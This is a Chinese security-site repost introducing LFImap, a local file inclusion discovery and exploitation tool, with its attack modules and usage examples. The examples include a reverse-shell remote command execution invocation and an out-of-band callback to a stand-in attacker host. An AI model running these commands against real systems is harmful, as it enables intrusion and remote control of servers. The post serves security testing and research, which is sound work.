本地文件包含发现和利用工具

admin 2024年12月24日12:42:31评论11 views字数 969阅读3分13秒阅读模式

本地文件包含发现和利用工具

工具简介

LFImap是一款本地文件包含发现和利用工具,该项目处于预alpha阶段。主要版本1.0即将推出,其中包含大量新功能和模块。

主要特点

使用不同模块进行攻击:过滤包装文件包含数据包装器远程命令执行输入包装器远程命令执行期望包装器远程命令执行文件包装器文件包含路径遍历攻击远程文件包含自定义多语言命令注入启发式扫描  自定义多语言XSS、CRLF检查  打开重定向检查  基于错误的文件包含信息泄漏测试模式: -U -> 指定要测试的单个URL -F -> 指定要测试的URL单词表 -R -> 指定要测试的文件中原始http完全控制HTTP请求测试参数的规范(GET、FORM-line、Header、自定义注入点)自定义HTTP标头的规范能够使用任意格式行(POST)数据进行测试能够使用任意HTTP方法进行测试能够通过Web代理转移请求能够将所有请求和响应记录到文件中能够通过请求之间的超时和最大响应时间调整测试支持通过url和base64编码操作有效载荷快速模式(-q),其中LFImap使用较少的精心挑选的有效载荷二阶(存储)漏洞检查支持Beta/测试阶段CSRF处理支持
使用示例

1)使用‘-a’来利用所有支持的攻击模块。
python3 lfimap.py -U "http://IP/vuln.php?param=testme" -C "PHPSESSID=XXXXXXXX" -a
本地文件包含发现和利用工具

2)使用‘-D’进行参数后测试

python3 lfimap.py -U "http://IP/index.php" -D "page=testme" -a
本地文件包含发现和利用工具

3)使用‘-x’进行反向 shell 远程命令执行攻击

python3 lfimap.py -U "http://IP/vuln.php?param=testme" -C "PHPSESSID=XXXXXXXX" -a -x --lhost <IP> --lport <PORT>
本地文件包含发现和利用工具

4)使用“--callback”实现带外盲漏洞详细测试支持

python3 lfimap.py -U "http://IP/index.php?param=testme" -a -v --callback="attacker.oastify.com"

本地文件包含发现和利用工具

下载地址

https://github.com/hansmach1ne/LFImap

原文始发于微信公众号(黑白之道):本地文件包含发现和利用工具

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月24日12:42:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   本地文件包含发现和利用工具https://cn-sec.com/archives/3546693.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息